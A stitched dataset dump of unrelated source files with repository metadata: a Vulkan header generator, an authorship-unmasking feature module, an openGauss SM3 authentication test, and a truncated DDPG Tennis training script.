HeadData.pNext = nullptr;
StructureDataPointers.push_back(&HeadData);
STypeOffsets.push_back(offsetof(HeadType, sType));
PNextPointerOffsets.push_back(offsetof(HeadType, pNext));
StructureDataIndices[ValidStructureType<HeadType>] = 0;
}
template<typename HeadType>
template<typename Struct>
inline void GenericStructureChain<HeadType>::AppendToChain(Struct& next)
{
AppendDataToChain(&next, offsetof(Struct, sType), offsetof(Struct, pNext), ValidStructureType<Struct>);
}
template<typename HeadType>
inline void GenericStructureChain<HeadType>::AppendToChainGeneric(GenericStructBase& nextBlobData)
{
AppendDataToChain(nextBlobData.GetStructureData(), nextBlobData.GetSTypeOffset(), nextBlobData.GetPNextOffset(), nextBlobData.GetSType());
}
template<typename HeadType>
inline void GenericStructureChain<HeadType>::AppendDataToChain(void* dataPtr, size_t sTypeOffset, size_t pNextOffset, VulkanStructureType sType)
{
std::byte* prevLastStruct = StructureDataPointers.back();
ptrdiff_t prevPNextOffset = PNextPointerOffsets.back();
StructureDataPointers.push_back(reinterpret_cast<std::byte*>(dataPtr));
STypeOffsets.push_back(sTypeOffset);
PNextPointerOffsets.push_back(pNextOffset);
std::byte* currLastStructPtr = StructureDataPointers.back();
InitSType(dataPtr, sTypeOffset, sType); //Set sType of the current struct
memcpy(prevLastStruct + prevPNextOffset, &currLastStructPtr, sizeof(std::byte*)); //Set pNext pointer of the previous struct
StructureDataIndices[sType] = StructureDataPointers.size() - 1;
}
//==========================================================================================================================
//Generic structure chain, owning version
template<typename HeadType>
class StructureChainBlob: public GenericStructureChainBase<HeadType>
{
using GenericStructureChainBase<HeadType>::StructureDataPointers;
using GenericStructureChainBase<HeadType>::STypeOffsets;
using GenericStructureChainBase<HeadType>::PNextPointerOffsets;
using GenericStructureChainBase<HeadType>::StructureDataIndices;
public:
StructureChainBlob();
StructureChainBlob(const HeadType& head);
~StructureChainBlob();
//Clears everything EXCEPT head
void Clear();
template<typename Struct>
void AppendToChain(const Struct& next);
void AppendToChainGeneric(const GenericStructBase& nextBlobData);
public:
StructureChainBlob(const StructureChainBlob& rhs) = delete;
StructureChainBlob& operator=(const StructureChainBlob& rhs) = delete;
private:
void AppendDataToBlob(const std::byte* data, size_t dataSize, const void* dataPNext, ptrdiff_t dataSTypeOffset, ptrdiff_t dataPNextOffset, VulkanStructureType sType);
private:
std::vector<std::byte> StructureChainBlobData;
};
template<typename HeadType>
inline StructureChainBlob<HeadType>::StructureChainBlob()
{
static_assert(std::is_trivially_destructible<HeadType>::value, "All members of the structure chain blob must be trivially destructible");
//Store head in the blob
StructureChainBlobData.resize(sizeof(HeadType));
HeadType head;
InitSType(&head, offsetof(HeadType, sType), ValidStructureType<HeadType>);
head.pNext = nullptr;
memcpy(StructureChainBlobData.data(), &head, sizeof(HeadType));
StructureDataPointers.push_back(StructureChainBlobData.data());
STypeOffsets.push_back(offsetof(HeadType, sType));
PNextPointerOffsets.push_back(offsetof(HeadType, pNext));
StructureDataIndices[ValidStructureType<HeadType>] = 0;
}
template<typename HeadType>
inline StructureChainBlob<HeadType>::StructureChainBlob(const HeadType& head)
{
static_assert(std::is_trivially_destructible<HeadType>::value, "All members of the structure chain blob must be trivially destructible");
//Store head in the blob
StructureChainBlobData.resize(sizeof(HeadType));
memcpy(StructureChainBlobData.data(), &head, sizeof(HeadType));
StructureDataPointers.push_back(StructureChainBlobData.data());
STypeOffsets.push_back(offsetof(HeadType, sType));
PNextPointerOffsets.push_back(offsetof(HeadType, pNext));
VulkanStructureType headSType = ValidStructureType<HeadType>;
void* headPNext = nullptr;
InitSType(StructureDataPointers.back(), STypeOffsets.back(), headSType);
memcpy(StructureDataPointers.back() + PNextPointerOffsets.back(), &headPNext, sizeof(void*));
StructureDataIndices[ValidStructureType<HeadType>] = 0;
}
template<typename HeadType>
inline StructureChainBlob<HeadType>::~StructureChainBlob()
{
}
template<typename HeadType>
inline void StructureChainBlob<HeadType>::Clear()
{
//Save the head
HeadType& headData = GenericStructureChainBase<HeadType>::GetChainHead();
std::vector<std::byte> oldHead(sizeof(HeadType));
memcpy(oldHead.data(), &headData, sizeof(HeadType));
//Clear everything
StructureChainBlobData.clear();
StructureDataPointers.clear();
STypeOffsets.clear();
PNextPointerOffsets.clear();
StructureDataIndices.clear();
//Reinit
StructureChainBlobData.resize(sizeof(HeadType));
memcpy(StructureChainBlobData.data(), oldHead.data(), sizeof(HeadType));
StructureDataPointers.push_back(StructureChainBlobData.data());
STypeOffsets.push_back(offsetof(HeadType, sType));
PNextPointerOffsets.push_back(offsetof(HeadType, pNext));
StructureDataIndices[ValidStructureType<HeadType>] = 0;
}
template<typename HeadType>
template<typename Struct>
inline void StructureChainBlob<HeadType>::AppendToChain(const Struct& next)
{
static_assert(std::is_trivially_destructible<Struct>::value, "All members of the structure chain blob must be trivially destructible");
AppendDataToBlob((const std::byte*)(&next), sizeof(Struct), next.pNext, offsetof(Struct, sType), offsetof(Struct, pNext), ValidStructureType<Struct>);
}
template<typename HeadType>
inline void StructureChainBlob<HeadType>::AppendToChainGeneric(const GenericStructBase& nextBlobData)
{
AppendDataToBlob(nextBlobData.GetStructureData(), nextBlobData.GetStructureSize(), nextBlobData.GetPNext(), nextBlobData.GetSTypeOffset(), nextBlobData.GetPNextOffset(), nextBlobData.GetSType());
}
template<typename HeadType>
inline void StructureChainBlob<HeadType>::AppendDataToBlob(const std::byte* data, size_t dataSize, const void* dataPNext, ptrdiff_t dataSTypeOffset, ptrdiff_t dataPNextOffset, VulkanStructureType sType)
{
size_t prevDataSize = StructureChainBlobData.size();
size_t nextDataOffset = prevDataSize;
//Copy all current structures to the new chain, and append new structure
std::vector<std::byte> newStructureChainData(prevDataSize + dataSize);
memcpy(newStructureChainData.data(), StructureChainBlobData.data(), prevDataSize);
memcpy(newStructureChainData.data() + prevDataSize, data, dataSize);
//Initialize sType
InitSType(newStructureChainData.data() + prevDataSize, dataSTypeOffset, sType);
//Rebuild StructureDataPointers
std::vector<ptrdiff_t> structureDataOffsets(StructureDataPointers.size());
for(size_t i = 0; i < StructureDataPointers.size(); i++)
{
structureDataOffsets[i] = (StructureDataPointers[i] - &StructureChainBlobData[0]);
}
StructureDataPointers.clear();
for(size_t i = 0; i < structureDataOffsets.size(); i++)
{
StructureDataPointers.push_back(newStructureChainData.data() + structureDataOffsets[i]);
}
StructureDataPointers.push_back(newStructureChainData.data() + nextDataOffset);
STypeOffsets.push_back(dataSTypeOffset);
PNextPointerOffsets.push_back(dataPNextOffset);
//Invalidate pNext pointers
for(size_t i = 0; i < PNextPointerOffsets.size() - 1; i++)
{
void** currPPNext = (void**)(StructureDataPointers[i] + PNextPointerOffsets[i]);
memcpy(currPPNext, &StructureDataPointers[i + 1], sizeof(void*));
}
//Invalidate the last pNext pointer with the provided one
std::byte* pLastStruct = StructureDataPointers.back();
memcpy(pLastStruct + dataPNextOffset, &dataPNext, sizeof(void*));
//Only use move semantics, because copy semantics will make pNext pointers invalid once again
StructureChainBlobData = std::move(newStructureChainData);
//Make sure all pNext point to inside of StructureChainBlobData. The last pointer can point to whatever the user specified
for(size_t i = 0; i < PNextPointerOffsets.size() - 1; i++)
{
void* pNextPointer = nullptr;
memcpy(&pNextPointer, StructureDataPointers[i] + PNextPointerOffsets[i], sizeof(void*)); //Init the pointer data
assert(pNextPointer >= &StructureChainBlobData[0] && pNextPointer < (&StructureChainBlobData[0] + StructureChainBlobData.size())); //Move semantics should never break pNext pointers, they should always point to inside the blob
}
StructureDataIndices[sType] = StructureDataPointers.size() - 1;
}
}
#endif
"""
def open_vk_spec(url):
with urllib.request.urlopen(url) as response:
spec_data = response.read()
return spec_data.decode("utf8")
def parse_stypes(spec_contents):
spec_soup = BeautifulSoup(spec_contents, features="xml")
spec_platform_defines = {}
spec_platforms_block = spec_soup.find("platforms")
if spec_platforms_block is not None:
spec_platform_tags = spec_platforms_block.find_all("platform")
for platform_tag in spec_platform_tags:
spec_platform_defines[platform_tag["name"]] = platform_tag["protect"]
spec_struct_extensions = {}
extension_define_names = {}
extension_blocks = spec_soup.find_all("extension")
for extension_block in extension_blocks:
extension_name = extension_block["name"]
extension_define_tag = extension_block.find("enum", {"value": re.compile(".*" + extension_name +".*")})
if extension_define_tag is None:
continue
extension_define_name = extension_define_tag["name"]
if extension_define_name is None:
continue
extension_define_names[extension_name] = extension_define_name
extension_require_blocks = extension_block.find_all("require")
for extension_require_block in extension_require_blocks:
extension_types = []
extension_type_tags = extension_require_block.find_all("type")
for type_tag in extension_type_tags:
extension_defined_type = type_tag["name"]
if extension_defined_type is not None:
extension_types.append(extension_defined_type)
extension_platform = ""
if "platform" in extension_block.attrs:
extension_platform = extension_block["platform"]
extension_platform_define = ""
if extension_platform in spec_platform_defines:
extension_platform_define = spec_platform_defines[extension_platform]
extension_names = [extension_name]
if "extension" in extension_require_block.attrs:
extension_names.append(extension_require_block["extension"])
for extension_type in extension_types:
spec_struct_extensions[extension_type] = (extension_name, extension_names, extension_platform_define)
stypes = []
struct_blocks = spec_soup.find_all("type", {"category": "struct"})
for struct_block in struct_blocks:
struct_type = struct_block["name"]
#Find only structs that have <member> tag with "values" attibute
struct_stype_member_tags = [member_tag for member_tag in struct_block.find_all("member") if "values" in member_tag.attrs]
if len(struct_stype_member_tags) == 0:
continue
stype = ""
for member_tag in struct_stype_member_tags:
name_tag = member_tag.find("name")
if name_tag is not None and name_tag.string == "sType":
stype = member_tag["values"]
break
extension_defines = []
platform_define = ""
if struct_type in spec_struct_extensions:
struct_requires = spec_struct_extensions[struct_type]
extension_defines = [extension_define_names[extension_name] for extension_name in struct_requires[1]]
platform_define = struct_requires[2]
stypes.append((struct_type, stype, extension_defines, platform_define))
stypes = sorted(stypes, key=lambda struct_data: struct_data[2])
stypes = sorted(stypes, key=lambda struct_data: struct_data[3])
return stypes
def compile_cpp_header_h(stypes):
cpp_data = ""
cpp_data += header_license
cpp_data += header_start_h
current_extension_defines = []
current_platform_define = ""
tab_level = ""
for stype in stypes:
if current_extension_defines != stype[2] or current_platform_define != stype[3]:
if len(current_extension_defines) != 0 or current_platform_define != "":
cpp_data += "#endif\n"
tab_level = ""
if len(stype[2]) != 0 or stype[3] != "":
tab_level = "\t"
cpp_data += "\n#if "
if len(stype[2]) != 0:
cpp_data += "defined(" + stype[2][0] + ")"
for extra_extension_define in stype[2][1:]:
cpp_data += " && defined(" + extra_extension_define + ")"
if stype[3] != "":
cpp_data += " && "
if stype[3] != "":
cpp_data += "defined(" + stype[3] + ")"
current_extension_defines = stype[2]
current_platform_define = stype[3]
cpp_data += "\n"
cpp_data += tab_level + "template<>\n"
cpp_data += tab_level + "constexpr VulkanStructureType ValidStructureType<" + stype[0] + "> = " + stype[1] + ";\n"
if len(current_extension_defines) != 0 or current_platform_define != "":
cpp_data += "#endif\n\n"
cpp_data += header_stype_init_h
cpp_data += header_end
return cpp_data
def compile_cpp_header_hpp(stypes):
cpp_data = ""
cpp_data += header_license
cpp_data += header_start_hpp
cpp_data += header_stype_init_hpp
cpp_data += header_end
return cpp_data
def save_file(contents, filename):
with open(filename, "w", encoding="utf-8") as out_file:
out_file.write(contents)
if __name__ == "__main__":
spec_text = open_vk_spec("https://raw.githubusercontent.com/KhronosGroup/Vulkan-Docs/main/xml/vk.xml") #Get it directly from the master branch
stypes = parse_stypes(spec_text)
cpp_header_data_h = compile_cpp_header_h(stypes)
cpp_header_data_hpp = compile_cpp_header_hpp(stypes)
save_file(cpp_header_data_h, "./Include/VulkanGenericStructures.h")
save_file(cpp_header_data_hpp, "./Include/VulkanGenericStructures.hpp")
| 32.35
| 228
| 0.756054
|
437db912a5ae4233926d281fb4dfb9b977565497
| 9,601
|
py
|
Python
|
authorship_unmasking/features/feature_sets.py
|
torond/unmasking
|
247f3510a43ca9cafca54a72eab885521c259232
|
[
"Apache-2.0"
] | 5
|
2020-03-02T10:39:07.000Z
|
2021-08-31T21:06:37.000Z
|
authorship_unmasking/features/feature_sets.py
|
torond/unmasking
|
247f3510a43ca9cafca54a72eab885521c259232
|
[
"Apache-2.0"
] | 2
|
2019-06-27T10:56:11.000Z
|
2021-05-22T12:51:07.000Z
|
authorship_unmasking/features/feature_sets.py
|
torond/unmasking
|
247f3510a43ca9cafca54a72eab885521c259232
|
[
"Apache-2.0"
] | 3
|
2021-04-03T12:01:16.000Z
|
2021-10-01T16:15:02.000Z
|
# Copyright (C) 2017-2019 Janek Bevendorff, Webis Group
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from authorship_unmasking.conf.interfaces import instance_property, instance_list_property
from authorship_unmasking.features.interfaces import ChunkSampler, FeatureSet
from authorship_unmasking.input.interfaces import SamplePair, Tokenizer
from authorship_unmasking.input.tokenizers import WordTokenizer, CharNgramTokenizer, DisjunctCharNgramTokenizer
from authorship_unmasking.util.util import lru_cache
from copy import deepcopy
import numpy
from math import ceil
from nltk import FreqDist
from typing import List, Iterable
class MetaFeatureSet(FeatureSet):
"""
Feature set combining features of several feature sets into a single feature vector
of the given length. Vector lengths of sub feature are according to the configured
sub feature proportions.
"""
def __init__(self, pair: SamplePair = None, sampler: ChunkSampler = None):
super().__init__(pair, sampler)
self._sub_features = [] # type: List[FeatureSet]
self._sub_feature_proportions = [] # type: List[int]
def add_sub_feature(self, feature: FeatureSet):
"""
Add an individual sub feature.
:param feature: feature set to add
"""
self._sub_features.append(feature)
@instance_list_property(delegate_args=True)
def sub_features(self) -> List[FeatureSet]:
""" Get sub features. """
return self._sub_features
@sub_features.setter
def sub_features(self, features: List[FeatureSet]):
""" Set sub features. """
self._sub_features = features
@property
def feature_proportions(self) -> List[int]:
""" Get sub feature proportions. """
return self._sub_feature_proportions
@feature_proportions.setter
def feature_proportions(self, proportions: List[int]):
""" Set sub feature proportions. """
self._sub_feature_proportions = proportions
def _get_features(self, n, func) -> Iterable[numpy.ndarray]:
sum_weights = sum(self._sub_feature_proportions)
proportions = numpy.concatenate((self._sub_feature_proportions,
numpy.ones(len(self._sub_features) - len(self._sub_feature_proportions))))
proportions = [ceil(n * w / sum_weights) for w in proportions]
return numpy.concatenate([list(getattr(f, func)(proportions[i]))
for i, f in enumerate(self._sub_features)], axis=1)
def get_features_absolute(self, n: int) -> Iterable[numpy.ndarray]:
return self._get_features(n, "get_features_absolute")
def get_features_relative(self, n: int) -> Iterable[numpy.ndarray]:
return self._get_features(n, "get_features_relative")
class MultiChunkFeatureSet(MetaFeatureSet):
"""
Meta feature set to be used with chunks generated by a :class::MultiChunker.
The number of sub features of this FeatureSet has to be the same as the number
of sub chunks of the MultiChunker.
"""
def __init__(self, pair: SamplePair = None, sampler: ChunkSampler = None):
super().__init__(pair, sampler)
self._sub_features_initialized = False
def _get_features(self, n, func) -> Iterable[numpy.ndarray]:
if not self._sub_features_initialized:
for i, feature in enumerate(self._sub_features):
if len(self._sub_features) != len(self.pair.chunks_a[i]) != len(self.pair.chunks_b[i]):
raise ValueError("Number of sub chunks needs to be the same as number of sub features.")
new_pair = deepcopy(self.pair)
new_pair.pair_id = self.pair.pair_id
new_chunks_a = [c[i] for c in new_pair.chunks_a]
new_chunks_b = [c[i] for c in new_pair.chunks_b]
new_pair.replace_chunks(new_chunks_a, new_chunks_b)
feature.pair = new_pair
self._sub_features_initialized = True
return super()._get_features(n, func)
class CachedAvgTokenCountFeatureSet(FeatureSet):
"""
Generic feature set which uses the average frequency counts per chunk of the
tokens generated by a specified tokenizer and caches them in memory.
By default, the cache size is limited to 2000 chunks.
"""
def __init__(self, pair: SamplePair = None, sampler: ChunkSampler = None, chunk_tokenizer: Tokenizer = None):
"""
:param pair: pair of chunked texts
:param sampler: :class:`ChunkSampler` for sampling chunks from ``pair``
:param chunk_tokenizer: tokenizer for tokenizing chunks
"""
super().__init__(pair, sampler)
self._chunk_tokenizer = chunk_tokenizer
self._is_prepared = False
self.__freq_a = None
self.__freq_b = None
self._chunks = []
@instance_property
def chunk_tokenizer(self) -> Tokenizer:
return self._chunk_tokenizer
@chunk_tokenizer.setter
def chunk_tokenizer(self, tokenizer):
self._chunk_tokenizer = tokenizer
@FeatureSet.pair.setter
def pair(self, pair):
self._pair = pair
self._chunks = []
self._is_prepared = False
def _prepare(self):
if self._is_prepared:
return
freq_dist_a = FreqDist()
for a in self._pair.chunks_a:
freq_dist_a.update(self._tokenize(a))
freq_dist_b = FreqDist()
for b in self._pair.chunks_b:
freq_dist_b.update(self._tokenize(b))
self._avg_freq_dist = FreqDist()
n_a = freq_dist_a.N()
n_b = freq_dist_b.N()
for a in freq_dist_a:
self._avg_freq_dist[a] = (freq_dist_a[a] / n_a + freq_dist_b[a] / n_b) / 2.0
for b in freq_dist_b:
if self._avg_freq_dist[b] != 0.0:
continue
self._avg_freq_dist[b] = (freq_dist_a[b] / n_a + freq_dist_b[b] / n_b) / 2.0
self._chunks = self._sampler.generate_chunk_pairs(self._pair)
self.__freq_a = None
self.__freq_b = None
self._is_prepared = True
def get_features_absolute(self, n: int) -> Iterable[numpy.ndarray]:
self._prepare()
top_n_words = numpy.array([w for (w, f) in self._avg_freq_dist.most_common(n)])
num_top_words = len(top_n_words)
for c in self._chunks:
vec = numpy.zeros(2 * n)
self.__freq_a = FreqDist(self._tokenize(c[0]))
for i in range(0, n):
if i >= num_top_words:
break
vec[i] = self.__freq_a[top_n_words[i]]
self.__freq_b = FreqDist(self._tokenize(c[1]))
for i in range(n, 2 * n):
if i >= num_top_words + n:
break
vec[i] = self.__freq_b[top_n_words[i - n]]
yield vec
def get_features_relative(self, n: int) -> Iterable[numpy.ndarray]:
features = self.get_features_absolute(n)
for vec in features:
n_a = self.__freq_a.N()
for i in range(0, n):
vec[i] /= n_a
n_b = self.__freq_b.N()
for i in range(n, 2 * n):
vec[i] /= n_b
yield vec
@lru_cache(maxsize=200)
def _tokenize(self, text) -> List[str]:
return list(self._chunk_tokenizer.tokenize(text))
class AvgWordFreqFeatureSet(CachedAvgTokenCountFeatureSet):
"""
Feature set using the average frequencies of the n most
frequent words in both input chunk sets.
"""
def __init__(self, pair: SamplePair = None, sampler: ChunkSampler = None):
super().__init__(pair, sampler, WordTokenizer())
class AvgCharNgramFreqFeatureSet(CachedAvgTokenCountFeatureSet):
"""
Feature set using the average frequencies of the k most
frequent character n-grams in both input chunk sets.
Default n-gram order is 3.
"""
def __init__(self, pair: SamplePair = None, sampler: ChunkSampler = None):
self.__tokenizer = CharNgramTokenizer(3)
super().__init__(pair, sampler, self.__tokenizer)
@property
def order(self) -> int:
""" Get n-gram order. """
return self.__tokenizer.order
@order.setter
def order(self, ngram_order: int):
""" Set n-gram order. """
self.__tokenizer.order = ngram_order
class AvgDisjunctCharNgramFreqFeatureSet(CachedAvgTokenCountFeatureSet):
"""
Feature set using the average frequencies of the k most
frequent character n-grams in both input chunk sets.
Default n-gram order is 3.
"""
def __init__(self, pair: SamplePair = None, sampler: ChunkSampler = None):
self.__tokenizer = DisjunctCharNgramTokenizer(3)
super().__init__(pair, sampler, self.__tokenizer)
@property
def order(self) -> int:
""" Get n-gram order. """
return self.__tokenizer.order
@order.setter
def order(self, ngram_order: int):
""" Set n-gram order. """
self.__tokenizer.order = ngram_order
| 35.297794
| 114
| 0.64962
|
c1de1ae660665c2bac52cb29fbace23b5ff843c0
| 7,749
|
py
|
Python
|
openGaussBase/testcase/SECURITY/ENCRYPTED/Opengauss_Function_Security_SM3_Case0048.py
|
opengauss-mirror/Yat
|
aef107a8304b94e5d99b4f1f36eb46755eb8919e
|
[
"MulanPSL-1.0"
] | null | null | null |
openGaussBase/testcase/SECURITY/ENCRYPTED/Opengauss_Function_Security_SM3_Case0048.py
|
opengauss-mirror/Yat
|
aef107a8304b94e5d99b4f1f36eb46755eb8919e
|
[
"MulanPSL-1.0"
] | null | null | null |
openGaussBase/testcase/SECURITY/ENCRYPTED/Opengauss_Function_Security_SM3_Case0048.py
|
opengauss-mirror/Yat
|
aef107a8304b94e5d99b4f1f36eb46755eb8919e
|
[
"MulanPSL-1.0"
] | null | null | null |
"""
Copyright (c) 2022 Huawei Technologies Co.,Ltd.
openGauss is licensed under Mulan PSL v2.
You can use this software according to the terms and conditions of the Mulan PSL v2.
You may obtain a copy of Mulan PSL v2 at:
http://license.coscl.org.cn/MulanPSL2
THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND,
EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,
MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
See the Mulan PSL v2 for more details.
"""
"""
Case Type : security_sm3
Case Name : 创建用户时加密算法MD5,认证方式sm3,非初始用户正确的密码通过JDBC连接数据库
Description :
1.修改password_encryption_type=0
2.pg_hba.conf文件中修改认证方式sm3
3.非初始用户正确的密码通过JDBC登录数据库
Expect :
1-2.参数设置成功
3.数据库连接失败
History :
"""
import os
import unittest
from yat.test import Node
from yat.test import macro
from testcase.utils.Common import Common
from testcase.utils.CommonSH import CommonSH
from testcase.utils.Logger import Logger
class Security(unittest.TestCase):
def setUp(self):
self.logger = Logger()
self.logger.info('--Opengauss_Function_Security_sm3_Case0048 start--')
self.userNode = Node('PrimaryDbUser')
self.primary_root = Node('PrimaryRoot')
self.DB_ENV_PATH = macro.DB_ENV_PATH
self.DB_INSTANCE_PATH = macro.DB_INSTANCE_PATH
self.sh_primy = CommonSH('PrimaryDbUser')
self.common = Common()
self.user = 'u_security_sm3_0048'
self.targetpath = "/home/jdbc_test"
self.properties = os.path.join(self.targetpath, "jdbc_connect.conf")
self.java_name = "jdbc_drop_schema_case0001"
self.script_name = 'bcprov-jdk15on-1.68'
self.config = os.path.join(self.DB_INSTANCE_PATH, 'pg_hba.conf')
self.confignew = os.path.join(self.DB_INSTANCE_PATH, 'pg_hba_bak.conf')
self.logger.info('--------获取参数默认值--------')
self.default_msg_list = ''
check_default = 'show password_encryption_type;'
default_msg = self.sh_primy.execut_db_sql(check_default)
self.logger.info(default_msg)
self.default_msg_list = default_msg.splitlines()[2].strip()
self.logger.info(self.default_msg_list)
self.logger.info('--------备份白名单文件---------')
cp_cmd = f"cp {self.config} {self.confignew}"
self.userNode.sh(cp_cmd).result()
def test_encrypted(self):
text = '---step1:修改password_encryption_type=0;expect:成功---'
self.logger.info(text)
exe_cmd1 = f'source {self.DB_ENV_PATH};' \
f'gs_guc reload -D {self.DB_INSTANCE_PATH} -c ' \
'"password_encryption_type=0"'
msg1 = self.userNode.sh(exe_cmd1).result()
self.logger.info(msg1)
check_cmd = 'show password_encryption_type;'
check_msg = self.sh_primy.execut_db_sql(check_cmd)
self.logger.info(check_msg)
self.common.equal_sql_mdg(check_msg, 'password_encryption_type', '0',
'(1 row)', flag='1')
text = '---step2:pg_hba.conf文件中增加认证方式为md5;expect:成功---'
self.logger.info(text)
exe_cmd2 = f'grep "IPv4 local connections:" {self.config}'
msg2 = self.userNode.sh(exe_cmd2).result()
self.logger.info(msg2)
insert_messages = f"host {self.userNode.db_name} {self.user} " \
f"{self.userNode.db_host}/32 sm3"
exe_cmd3 = f'sed -i "/{msg2}/a\{insert_messages}" {self.config}'
self.logger.info(exe_cmd3)
msg3 = self.userNode.sh(exe_cmd3).result()
self.logger.info(msg3)
restart_cmd = f'source {macro.DB_ENV_PATH};' \
f'gs_ctl restart -D {macro.DB_INSTANCE_PATH} -M primary'
restart_msg = self.userNode.sh(restart_cmd).result()
self.logger.info(restart_msg)
text = '---step3:创建用户1;expect:成功---'
self.logger.info(text)
sql_cmd4 = f'create user {self.user} with password \'' \
f'{macro.COMMON_PASSWD}\';'
msg4 = self.sh_primy.execut_db_sql(sql_cmd4)
self.logger.info(msg4)
self.assertIn('CREATE ROLE', msg4, '执行失败:' + text)
text = '---step4.1:写入配置文件,用户1设置正确的密码;expect:成功---'
self.logger.info(text)
self.common.scp_file(self.primary_root,
f"{self.java_name}.java", self.targetpath)
self.common.scp_file(self.primary_root,
f"{self.script_name}.jar", self.targetpath)
result = self.primary_root.sh(
f"touch {self.properties}").result()
self.logger.info(result)
config = f'echo "password={macro.COMMON_PASSWD}"> {self.properties}'
self.primary_root.sh(config)
config = f'echo "port={self.userNode.db_port}">> ' \
f'{self.properties}'
self.primary_root.sh(config)
config = f'echo "hostname={self.userNode.db_host}">> ' \
f'{self.properties}'
self.primary_root.sh(config)
config = f'echo "user={self.user}">> {self.properties}'
self.primary_root.sh(config)
config = f'echo "dbname={self.userNode.db_name}">> ' \
f'{self.properties}'
self.primary_root.sh(config)
config = f'cat {self.properties}'
result = self.primary_root.sh(config).result()
assert1 = "password=" in result and "port=" in result and \
"hostname=" in result and "user=" in result and \
"dbname=" in result
self.assertTrue(assert1, '执行失败:' + text)
text = '---step4.1:编译java脚本;expect:成功---'
self.logger.info(text)
scp_cmd = self.primary_root.scp_put(macro.JDBC_PATH,
f"{self.targetpath}/postgresql.jar")
self.logger.info(scp_cmd)
cmd = f"javac -encoding utf-8 -cp " \
f"{os.path.join(self.targetpath, 'postgresql.jar')} " \
f"{os.path.join(self.targetpath, f'{self.java_name}.java')}"
self.logger.info(cmd)
result = self.primary_root.sh(cmd).result()
self.logger.info(result)
text = '---step4.2:运行java脚本,数据库连接成功;expect:成功---'
self.logger.info(text)
cmd = f"java -cp {os.path.join(self.targetpath, 'postgresql.jar')}:" \
f"{os.path.join(self.targetpath, f'{self.script_name}.jar')}:" \
f"{self.targetpath} {self.java_name} -F" \
f" {self.properties}"
result = self.primary_root.sh(cmd).result()
self.logger.info(result)
self.assertIn('连接失败', result, '执行失败:' + text)
def tearDown(self):
self.logger.info('-------1.恢复配置文件中的信息------')
check_cmd = f'if [ -f {self.config} ];then mv {self.confignew} ' \
f'{self.config};rm -rf {self.targetpath};fi'
self.logger.info(check_cmd)
self.primary_root.sh(check_cmd).result()
restart_cmd = f'source {macro.DB_ENV_PATH};' \
f'gs_ctl restart -D {macro.DB_INSTANCE_PATH} -M primary'
restart_msg = self.userNode.sh(restart_cmd).result()
self.logger.info(restart_msg)
self.logger.info('-------2.恢复加密方式配置------')
exe_cmd2 = f'source {self.DB_ENV_PATH};' \
f'gs_guc reload -D {self.DB_INSTANCE_PATH} -c ' \
f'"password_encryption_type={self.default_msg_list}"'
msg2 = self.userNode.sh(exe_cmd2).result()
self.logger.info(msg2)
sql_cmd3 = 'show password_encryption_type;'
msg3 = self.sh_primy.execut_db_sql(sql_cmd3)
self.logger.info(msg3)
self.logger.info('-------3.删除用户-------')
sql_cmd4 = f'drop user {self.user}'
msg4 = self.sh_primy.execut_db_sql(sql_cmd4)
self.logger.info(msg4)
self.logger.info('--Opengauss_Function_Security_sm3_Case0048 finish--')
| 45.052326
| 84
| 0.623048
|
c4a6fc5dcfbae868a35b2a748dbf49a03120974f
| 5,852
|
py
|
Python
|
p3_collab_compet/main.py
|
guillecg/drlnd
|
b2d8fda6b90efbf1ca9b5ad98a504debb59a10ef
|
[
"MIT"
] | null | null | null |
p3_collab_compet/main.py
|
guillecg/drlnd
|
b2d8fda6b90efbf1ca9b5ad98a504debb59a10ef
|
[
"MIT"
] | null | null | null |
p3_collab_compet/main.py
|
guillecg/drlnd
|
b2d8fda6b90efbf1ca9b5ad98a504debb59a10ef
|
[
"MIT"
] | null | null | null |
import datetime
from pathlib import Path
import numpy as np
import torch
from collections import deque
import matplotlib.pyplot as plt
from unityagents import UnityEnvironment
from p3_collab_compet.agents.agent_ddpg import AgentDDPG
SEED = 42
SCORE_TARGET = 0.5
SCORE_WINDOW = 100
DEVICE = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
# Set seeds
torch.manual_seed(SEED)
np.random.seed(SEED)
# create folder architecture
PROJECT = 'p3_collab_compet'
START_TIME = datetime.datetime.now().strftime('%m-%d-%Y_%Hh%Mm')
EXPERIMENT_FOLDER = f'{PROJECT}/experiments/{START_TIME}'
Path(EXPERIMENT_FOLDER).mkdir(parents=True, exist_ok=False)
if __name__ == '__main__':
env_path = f'{PROJECT}/Tennis_Linux/Tennis.x86_64'
env = UnityEnvironment(file_name=env_path)
# get the default brain
brain_name = env.brain_names[0]
brain = env.brains[brain_name]
# reset the environment
env_info = env.reset(train_mode=True)[brain_name]
# number of agents
num_agents = len(env_info.agents)
print('Number of agents:', num_agents)
# size of each action
action_size = brain.vector_action_space_size
print('Size of each action:', action_size)
# examine the state space
states = env_info.vector_observations
state_size = states.shape[1]
print(
'There are {} agents. Each observes a state with length: {}'
.format(states.shape[0], state_size)
)
print('The state for the first agent looks like:', states[0])
# define the agent
agent = AgentDDPG(
state_size=state_size,
action_size=action_size,
hyperparams=dict(),
device=DEVICE,
seed=SEED
)
# training hyperparameters
n_episodes = 500 # maximum number of training episodes
max_t = 1000 # maximum number of timesteps per episode
gamma = 0.95
gamma_rate = 0.01
gamma_scale = 1.0 - gamma_rate
gamma_final = 0.99
tau = 0.01
tau_rate = 0.001
tau_scale = 1.0 - tau_rate
tau_final = 0.001
noise_factor = 1.0
noise_scale = 1.0
scores = [] # scores for each episode
scores_window = deque(maxlen=SCORE_WINDOW) # last 100 scores
scores_window_means = [] # average max scores for each episode
# training loop
for i_episode in range(1, n_episodes+1):
env_info = env.reset(train_mode=True)[brain_name] # reset the environment
states = env_info.vector_observations # get the current stat
agent.reset() # initialize agents
score = np.zeros(num_agents) # initialize scores
for t in range(max_t):
actions = agent.select_action(states) # get the action from the agent
env_info = env.step(actions)[brain_name] # send the action to the environment
next_states = env_info.vector_observations # get the next state
